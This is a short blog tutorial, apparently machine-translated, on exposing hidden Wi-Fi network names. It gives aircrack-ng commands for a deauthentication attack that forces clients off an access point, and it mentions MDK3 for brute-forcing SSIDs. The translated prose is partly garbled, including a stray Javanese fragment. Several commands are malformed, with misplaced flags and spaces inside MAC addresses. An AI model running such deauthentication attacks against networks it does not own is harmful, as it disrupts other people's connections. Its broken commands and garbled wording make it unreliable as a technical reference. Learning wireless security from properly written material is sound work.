There are several ways to view hidden ssid (cloaks hidden ssid);
- Waiting for client to connect to the AP to perform authentication
- Deauthentication attack
- Brute Force SSID
# Waiting for client to connect to the AP to perform authentication:
take a long time
# Deauthentication attack:
To be faster, usually my wifi channel set to AP "destination" that will be in his peep ssid.
- Airmon-ng start [interface] [channel]
- Airodump [interface] [filename] [channel]
- Aireplay-ng -0 1-a XX: XX: XX: XX: XX: XX-c YY: YY: YY: YY: YY: YY [interface]
Description;
-0 1 = attack mode
-A XX: XX: XX: XX: XX: XX = MAC address of AP
C-YY: YY: YY: YY: YY: YY = Destination MAC address
Interface = ath0
Then see the results of capture using aireplay-ng airodump. Within seconds (emboh blonde seconds .. ora tau itung not ...:) ... .. appeared ssid "goal".
For more details, please refer to the manual aireplay-ng - help
SSID # Brute Force
Some attackers use tools such as MDK3.
SSID_jack was able to make cloaks hidden ssid.
Closing:
Do not do it on the others are owned by the network.
Link :
remote-exploit.com
securityfocus.com
Wi-foo, Andrew A. Vladimirov, Konstantin V. Gavrilenko, Andrei A. Mikhailovsky
Courtesy : http://adekrina.blogspot.com/2008/08/cloak-hidden-ssid.html
